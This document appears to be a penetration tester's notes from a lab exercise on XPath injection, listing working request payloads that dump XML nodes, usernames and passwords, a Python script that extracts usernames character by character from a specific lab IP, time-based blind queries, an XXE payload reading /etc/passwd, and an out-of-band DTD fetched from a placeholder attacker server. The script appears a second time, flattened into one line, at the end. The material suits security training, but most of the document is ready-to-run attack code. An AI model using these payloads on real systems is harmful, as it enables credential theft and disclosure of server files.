XPath Advanced Data Exfiltration

XPath Advanced Data Exfiltration Notes

1. Understanding XPath Injection

XPath is used to query XML data.
Injection occurs when user input is inserted into an XPath query without proper sanitization.
Common attacks include authentication bypass, data extraction, and blind XPath injection.

2. Successful Payload Analysis

The working payload:

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+/*[1]/*[2]/*[3]/*[1]/*[3]

The | (union operator) allowed traversal through multiple XML nodes.
The nested /*[1]/*[2]/*[3]/*[1]/*[3] structure accessed deeper elements in the XML hierarchy.

3. Additional Exploration

Extract Full XML Structure

Try dumping all available XML elements:
```
GET /index.php?q=SOMETHINGINVALID&f=| //*
```

Navigate deeper step by step:

GET /index.php?q=SOMETHINGINVALID&f=| /*/*/*/*

Extract Multiple Fields

To retrieve multiple values at once:

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | phone | email

Extract Usernames and Passwords

List all users:

GET /index.php?q=SOMETHINGINVALID&f=//users/user/*

Extract credentials:

GET /index.php?q=SOMETHINGINVALID&f=//users/user[1]/password

4. Blind XPath Injection

Boolean-Based Extraction

Check if a username starts with ‘A’:

GET /index.php?q=SOMETHINGINVALID&f=boolean(substring(//users/user/username,1,1)='A')

Automated Character-by-Character Extraction

import requests
import string

url = "http://94.237.53.146:51113/index.php"
extracted_data = ""

for i in range(1, 50):  # Adjust based on expected length
    for char in string.ascii_letters + string.digits:
        payload = f"substring(//users/user/username,{i},1)='{char}'"
        response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload})
        
        if "valid response" in response.text:  # Adjust based on response behavior
            extracted_data += char
            print(f"Extracted so far: {extracted_data}")
            break

print(f"Final Extracted Data: {extracted_data}")

5. Advanced Attacks

Time-Based Blind Injection

If there’s no direct output, force longer responses:

GET /index.php?q=SOMETHINGINVALID&f=if(boolean(substring(//users/user/username,1,1)='A'), //*[count(//users/user/*) > 100000], //*[1])

Testing for XXE Injection

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

If the response includes file contents, the server is vulnerable.

Out-of-Band (OOB) Data Exfiltration

<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://your-server.com/malicious.dtd"> %remote; ]>

If the server contacts your external URL, it confirms an OOB vulnerability.

Conclusion

XPath injection was successfully exploited.
Additional attacks were tested for further enumeration.
Blind extraction techniques and external entity vulnerabilities were explored.

PreviousXPath Injection - Authentication Bypass NextPayloads

Last updated 2 months ago

import requests import string url = "http://94.237.53.146:51113/index.php" extracted_data = "" for i in range(1, 50): # Adjust based on expected length for char in string.ascii_letters + string.digits: payload = f"substring(//users/user/username,{i},1)='{char}'" response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload}) if "valid response" in response.text: # Adjust based on response behavior extracted_data += char print(f"Extracted so far: {extracted_data}") break print(f"Final Extracted Data: {extracted_data}")